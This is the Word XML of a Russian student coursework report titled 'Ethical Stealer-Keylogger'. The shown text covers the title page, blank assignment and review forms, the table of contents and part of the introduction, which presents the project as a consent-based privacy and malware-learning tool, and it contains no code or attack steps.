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72E8" w14:textId="77777777" w:rsidR="00C123F8" w:rsidRPr="00C123F8" w:rsidRDefault="00C123F8" w:rsidP="00C123F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
          <w:tab w:val="left" w:pos="5580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423B099E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ECDC58" w14:textId="3F8C4B82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8F9B0" wp14:editId="3D77FF5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C879" w14:textId="77777777" w:rsidR="00511776" w:rsidRDefault="00511776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15AACD9C" w14:textId="77777777" w:rsidR="00511776" w:rsidRPr="00E16CF6" w:rsidRDefault="00511776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549E92B1" w14:textId="77777777" w:rsidR="00511776" w:rsidRPr="00030118" w:rsidRDefault="00511776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_______________________________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F9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2pt;margin-top:-6.1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xY7Yp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FAFC879" w14:textId="77777777" w:rsidR="00511776" w:rsidRDefault="00511776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15AACD9C" w14:textId="77777777" w:rsidR="00511776" w:rsidRPr="00E16CF6" w:rsidRDefault="00511776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549E92B1" w14:textId="77777777" w:rsidR="00511776" w:rsidRPr="00030118" w:rsidRDefault="00511776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_______________________________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123F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CE1CDC" wp14:editId="4135EE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E1607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2FE05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BE1C41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EE1B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3656A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A6A2A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BABFAE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85835F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1B816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Руководитель курсового</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59400E21" w14:textId="30257724" w:rsidR="00C123F8" w:rsidRPr="00C123F8" w:rsidRDefault="008E5CFC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П</w:t>
      </w:r>
      <w:r w:rsidR="00C123F8" w:rsidRPr="00C123F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>роектир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Мирвода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С.Г.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096AED4C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61E1FE6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Члены комиссии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CBAA99A" w14:textId="77777777" w:rsidR="00C123F8" w:rsidRPr="00C123F8" w:rsidRDefault="00C123F8" w:rsidP="00C123F8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00933C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C13B03B" w14:textId="487415EB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Дата защиты</w:t>
      </w:r>
      <w:r w:rsidR="008E5CFC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 13.01.2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5CB2F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4A2D9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C37908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0701D2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DDADE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6658BB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66CCB0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4C72BB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17E5ED85" w14:textId="5E70C7C4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Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>по теме:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C123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285F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Продукт «Этичный </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0023285F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Стилер-Кейлоггер</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0023285F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD5C488" w14:textId="1C5E0222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Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">по дисциплине: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Языки и методы программирования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E17E9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C2DB0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5A33EE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86D96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4EF0C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77CA27" w14:textId="61CD279E" w:rsidR="00C123F8" w:rsidRPr="00C123F8" w:rsidRDefault="00C123F8" w:rsidP="00C123F8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Студент:</w:t>
      </w:r>
      <w:r w:rsidR="007D553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C0F76">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Ко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ротков В.К, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Чуфаров</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 К.Н.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892F524" w14:textId="77777777" w:rsidR="00C123F8" w:rsidRPr="00C123F8" w:rsidRDefault="00C123F8" w:rsidP="00C123F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2410"/>
          <w:tab w:val="center" w:pos="7088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123F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>(ФИО)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C123F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>(Подпись)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D317A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540517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831C19" w14:textId="7C638ECB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Группа:</w:t>
      </w:r>
      <w:r w:rsidR="00944FC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РИ-311055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3D9D64D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FF457A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193CA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98D25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88540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4CED06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2DD3E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27EF4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138262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7DD2A7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071D7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026567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Екатеринбург</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F8EDF9" w14:textId="24C0702D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20</w:t>
      </w:r>
      <w:r w:rsidR="008417F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC120F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51AE62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FCE72C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83F1" wp14:editId="4A5F7942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5854" w14:textId="77777777" w:rsidR="00511776" w:rsidRDefault="00511776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35D34238" w14:textId="77777777" w:rsidR="00511776" w:rsidRDefault="00511776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04A01E90" w14:textId="77777777" w:rsidR="00511776" w:rsidRDefault="00511776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Кафедра «____________________________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3F1" id="Надпись 7" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:114.2pt;margin-top:-6.1pt;width:370.3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wsLwIAABg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" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="17125854" w14:textId="77777777" w:rsidR="00511776" w:rsidRDefault="00511776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35D34238" w14:textId="77777777" w:rsidR="00511776" w:rsidRDefault="00511776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04A01E90" w14:textId="77777777" w:rsidR="00511776" w:rsidRDefault="00511776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Кафедра «____________________________»</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00B7139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BBBC878" wp14:editId="7E068838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27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5DE0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471A8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D1000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FA4690" w14:textId="77777777" w:rsidR="00B7139E" w:rsidRPr="00B7139E" w:rsidRDefault="00B7139E" w:rsidP="00B7139E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71C320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2E578109" w14:textId="77777777" w:rsidR="00B7139E" w:rsidRPr="00B7139E" w:rsidRDefault="00B7139E" w:rsidP="00B7139E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="4395"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B7139E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFE0B0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  <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B7139E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>на  курсовой</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B7139E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> проект/работу</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F95CA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0A63BE72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тудент ___________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8DDE1A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группа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08E583F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пециальность/направление подготовки________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDC49B2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lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6103FF37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.Тема курсового проекта/работы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62BABE" w14:textId="77777777" w:rsidR="00B7139E" w:rsidRPr="00B7139E" w:rsidRDefault="00B7139E" w:rsidP="00B7139E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="9921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3A2FC16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.Содержание проекта/работы, в том числе состав графических работ и расчетов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EADDBF1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3.Дополнительные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сведе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EDB8171" w14:textId="77777777" w:rsidR="00B7139E" w:rsidRPr="00B7139E" w:rsidRDefault="00B7139E" w:rsidP="00B7139E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22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601C489" w14:textId="77777777" w:rsidR="00B7139E" w:rsidRPr="00B7139E" w:rsidRDefault="00B7139E" w:rsidP="00B7139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DD989B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78"/>
        <w:gridCol w:w="2478"/>
        <w:gridCol w:w="2478"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B7139E" w:rsidRPr="00B7139E" w14:paraId="7F9BBADC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E2B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Наименование элементов</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DA7BBFC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оектной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8FD6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B0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493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7139E" w:rsidRPr="00B7139E" w14:paraId="01023198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38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66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E4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E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6BD7BDCB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E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9A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EE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4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3C560C20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D9B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CB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D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25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0937768A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2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008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DFC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CB4561" w14:textId="77777777" w:rsidR="00B7139E" w:rsidRPr="00B7139E" w:rsidRDefault="00B7139E" w:rsidP="00B7139E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="5670"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24316B63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  <w:sectPr w:rsidR="00B7139E" w:rsidRPr="00B7139E">
          <w:footerReference w:type="default" r:id="rId12"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="851" w:right="851" w:bottom="851" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
        </w:sect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 Руководитель ________________________/И.О. Фамилия/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6605F6EC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14:paraId="0DDEA191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ФГАОУ ВО «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УрФУ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Б.Н.Ельцина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>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E8E562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139E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>РЕЦЕНЗИЯ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B4B2CC" w14:textId="77777777" w:rsidR="00B7139E" w:rsidRPr="00B7139E" w:rsidRDefault="00B7139E" w:rsidP="00B7139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на курсовую работу (проект)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3C1FEA" w14:textId="77777777" w:rsidR="00B7139E" w:rsidRPr="00B7139E" w:rsidRDefault="00B7139E" w:rsidP="00B7139E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="underscore" w:pos="6379"/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групп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9A12BBF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rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B7139E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (фамилия имя отчество)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6718331F" w14:textId="77777777" w:rsidR="00B7139E" w:rsidRPr="00B7139E" w:rsidRDefault="00B7139E" w:rsidP="00B7139E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="9214"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="141"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Тема курсовой работы: ___________________________________________________ ________________________________________________________________________________________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266E2C51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одуль/дисциплина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BA6E329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7C657D86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C8D7198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94BAE0F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761471F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 Оригинальность и самостоятельность выполнения работы_________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F249A6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059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3 Полнота и глубина проработки разделов ________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8571F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11C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236E37B6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C15A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5 Вопросы и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замеча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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B6E3DC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45039FF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EBFD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6 Общая оценка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работы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AE32898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14:paraId="67992755" w14:textId="77777777" w:rsidR="00B7139E" w:rsidRPr="00B7139E" w:rsidRDefault="00B7139E" w:rsidP="00B7139E">
      <w:pPr>
        <w:spacing w:before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ведения о рецензенте:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7986D918" w14:textId="77777777" w:rsidR="00B7139E" w:rsidRPr="00B7139E" w:rsidRDefault="00B7139E" w:rsidP="00B7139E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore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543592A" w14:textId="77777777" w:rsidR="00B7139E" w:rsidRPr="00B7139E" w:rsidRDefault="00B7139E" w:rsidP="00B7139E">
      <w:pPr>
        <w:tabs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 xml:space="preserve">Должность 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3C08C61" w14:textId="77777777" w:rsidR="00B7139E" w:rsidRPr="00B7139E" w:rsidRDefault="00B7139E" w:rsidP="00B7139E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="4536"/>
          <w:tab w:val="left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есто работ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CD64333" w14:textId="77777777" w:rsidR="00B7139E" w:rsidRPr="00B7139E" w:rsidRDefault="00B7139E" w:rsidP="00B7139E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="underscore" w:pos="4395"/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Уч. звание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Уч. степень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2DCCCD3" w14:textId="77777777" w:rsidR="00B7139E" w:rsidRPr="00B7139E" w:rsidRDefault="00B7139E" w:rsidP="00B7139E">
      <w:pPr>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6521"/>
          <w:tab w:val="left" w:pos="9214"/>
        </w:tabs>
        <w:ind w:firstLine="18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36573617"/>
      <w:bookmarkStart w:id="1" w:name="_Toc155993234"/>
      <w:bookmarkStart w:id="2" w:name="_Toc155993427"/>
      <w:bookmarkStart w:id="3" w:name="_Toc155993717"/>
      <w:r w:rsidRPr="004A5EC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подпись</w:t>
      </w:r>
      <w:r w:rsidRPr="004A5EC3">
        <w:t xml:space="preserve"> ______________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A5EC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Дата</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/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B7139E">
        <w:rPr>
          <w:rFonts w:ascii="Gogol" w:eastAsia="Times New Roman" w:hAnsi="Gogol" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A86D20E" w14:textId="5A855224" w:rsidR="00B7139E" w:rsidRPr="00511776" w:rsidRDefault="00B7139E" w:rsidP="00B7139E">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B7139E">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3869A488" w14:textId="7028A8AD" w:rsidR="00896401" w:rsidRDefault="00C373C9" w:rsidP="004A5EC3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc155993235"/>
      <w:r w:rsidRPr="004A5EC3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>СОДЕРЖАНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="53138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C525" w14:textId="44EEF760" w:rsidR="00D23AFA" w:rsidRDefault="000A338A">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="4123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70590" w14:textId="53745EB6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8" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ВВЕД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FBD5F73" w14:textId="02A09176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9" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1 Задачи руководител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F03753F" w14:textId="3F647073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0" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1 Функциональная диаграмма продукта как он видитс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72B5F41C" w14:textId="66EA6505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1" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2 Задачи проектировщ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962CAAF" w14:textId="2BA5C6D7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2" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 Архитектура продукта и обоснова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E0686CB" w14:textId="0A929970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3" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 Требования к системному ПО (ОС, СУБД)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B6E172E" w14:textId="05D2B7D4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4" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3 Архитектурные диаграммы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197BF5E3" w14:textId="40593DCF" w:rsidR="00D23AFA" w:rsidRDefault="0051177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5" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.1 Архитектурная диаграмма продукт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394C574" w14:textId="66F047C9" w:rsidR="00D23AFA" w:rsidRDefault="0051177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6" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">2.3.2 Функциональные диаграммы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: диаграмма прецеден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, диаграмма состояний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>.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6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D67D1A0" w14:textId="10891D17" w:rsidR="00D23AFA" w:rsidRDefault="0051177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7" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">2.3.3 Диаграмма последовательности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7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1C2D6" w14:textId="2E1A78BE" w:rsidR="00D23AFA" w:rsidRDefault="0051177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8" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.4 Концептуальная модель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7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9FC722B" w14:textId="5F1F0494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9" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3 Задачи разработч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24B4C113" w14:textId="3DD65CB8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0" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 Подобранные в соответствии с требованиями к системному ПО языки программировани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55FCD7E" w14:textId="6B3E0D13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1" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">3.2 Диаграмма паке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75B4194" w14:textId="7B7A5FAE" w:rsidR="00D23AFA" w:rsidRDefault="0051177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2" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3 Диаграмма физической модели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F8655" w14:textId="7024A004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3" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ЗАКЛЮЧ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3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A01543A" w14:textId="67B4761F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4" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>СПИСОК ИСПОЛЬЗОВАННЫХ ИСТОЧНИКОВ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4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0091DBF" w14:textId="3FC8E9EE" w:rsidR="00D23AFA" w:rsidRDefault="0051177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5" w:history="1">
            <w:r w:rsidR="00D23AFA" w:rsidRPr="00C17653">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Приложение А</w:t>
            </w:r>
            <w:r w:rsidR="009F77CA">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Код программ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563CBCF" w14:textId="59EF1BD6" w:rsidR="000A338A" w:rsidRDefault="000A338A" w:rsidP="00B103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83C282" w14:textId="77777777" w:rsidR="006E407B" w:rsidRPr="006E407B" w:rsidRDefault="006E407B" w:rsidP="000A338A"/>
    <w:p w14:paraId="4C7F3E80" w14:textId="77777777" w:rsidR="00C373C9" w:rsidRDefault="00C373C9" w:rsidP="00B7139E"/>
    <w:p w14:paraId="1143CD8C" w14:textId="15A0D4B2" w:rsidR="00556F33" w:rsidRDefault="00154009" w:rsidP="00154009">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc155993236"/>
      <w:bookmarkStart w:id="6" w:name="_Toc155993718"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ВВЕДЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="0650870A" w14:textId="77777777" w:rsidR="00C65025" w:rsidRDefault="00C65025" w:rsidP="008D5616"/>
    <w:p w14:paraId="3C942F9E" w14:textId="5C1F86A7" w:rsidR="000E0008" w:rsidRDefault="00C65025" w:rsidP="008D5616">
      <w:r>
        <w:t xml:space="preserve">Видение продукта. </w:t>
      </w:r>
      <w:r w:rsidR="008D5616">
        <w:t>Н</w:t>
      </w:r>
      <w:r w:rsidR="008D5616" w:rsidRPr="002F0376">
        <w:t>аш продукт представляет собой программу, ориентированную на безопасность и конфиденциальность пользователей. Это инструмент, который помогает защитить личные данные и информацию</w:t>
      </w:r>
      <w:r w:rsidR="008D5616">
        <w:t>, предоставляет возможность изучить простые виды кибератак, а также, что немаловажно, позволяет своим авторам сделать первые шаги в области кибербезопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DE6321" w14:textId="349E84C2" w:rsidR="008D5616" w:rsidRPr="000E0008" w:rsidRDefault="000E0008" w:rsidP="008D5616">
      <w:r>
        <w:t>Цель этого продукта -</w:t>
      </w:r>
      <w:r w:rsidR="00384F39" w:rsidRPr="00384F39">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0376">
        <w:t>обеспечить безопасность и конфиденциальность данных пользователя</w:t>
      </w:r>
      <w:r>
        <w:t>, путем указания на наличие уязвимостей на его устройстве, а также помочь изучить такой вид кибератаки как «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>malware</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="000E0008">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB4F080" w14:textId="74A1417B" w:rsidR="008D5616" w:rsidRPr="002F0376" w:rsidRDefault="00670B98" w:rsidP="008D5616">
      <w:r>
        <w:t>Продукт</w:t>
      </w:r>
      <w:r w:rsidR="008D5616" w:rsidRPr="002F0376">
        <w:t xml:space="preserve"> является этичн</w:t>
      </w:r>
      <w:r>
        <w:t>ым</w:t>
      </w:r>
      <w:r w:rsidR="008D5616" w:rsidRPr="002F0376">
        <w:t xml:space="preserve"> и прозрачн</w:t>
      </w:r>
      <w:r w:rsidR="00EA6ADD">
        <w:t>ым</w:t>
      </w:r>
      <w:r w:rsidR="008D5616" w:rsidRPr="002F0376">
        <w:t>, так как для е</w:t>
      </w:r>
      <w:r w:rsidR="00EA6ADD">
        <w:t>го</w:t>
      </w:r>
      <w:r w:rsidR="008D5616" w:rsidRPr="002F0376">
        <w:t xml:space="preserve"> запуска необходимо явное согласие пользователя</w:t>
      </w:r>
      <w:r w:rsidR="008D5616">
        <w:t>, а все данные передаются по защищенному каналу и не могут быть просмотрены никем, кроме самого пользователя</w:t>
      </w:r>
      <w:r w:rsidR="008D5616" w:rsidRPr="002F0376">
        <w:t xml:space="preserve">. Он также обязательно требует мастер-ключа для </w:t>
      </w:r>
      <w:r w:rsidR="008D5616">
        <w:t>своей работы</w:t>
      </w:r>
      <w:r w:rsidR="008D5616" w:rsidRPr="002F0376">
        <w:t>, что гарантирует е</w:t>
      </w:r>
      <w:r w:rsidR="00524EF5">
        <w:t>го</w:t>
      </w:r>
      <w:r w:rsidR="008D5616" w:rsidRPr="002F0376">
        <w:t xml:space="preserve"> защищенность</w:t>
      </w:r>
      <w:r w:rsidR="008D5616">
        <w:t xml:space="preserve"> и не использование во вред</w:t>
      </w:r>
      <w:r w:rsidR="008D5616" w:rsidRPr="002F0376">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554286C4" w14:textId="5CA40321" w:rsidR="008D5616" w:rsidRDefault="008D5616" w:rsidP="008D5616">
      <w:r w:rsidRPr="002F0376">
        <w:t xml:space="preserve">Важно отметить, что </w:t>
      </w:r>
      <w:r w:rsidR="00A77832">
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0376">
        <w:t>рограмма не используется для незаконного доступа или кражи личной информации, а направлена на защиту пользователей и их конфиденциальности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B18E5AD" w14:textId="252FEBC6" w:rsidR="00B93D6E" w:rsidRDefault="00B93D6E" w:rsidP="008D5616"/>
    <w:p w14:paraId="3A74E12C" w14:textId="30EF3172" w:rsidR="00B93D6E" w:rsidRDefault="00B93D6E">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
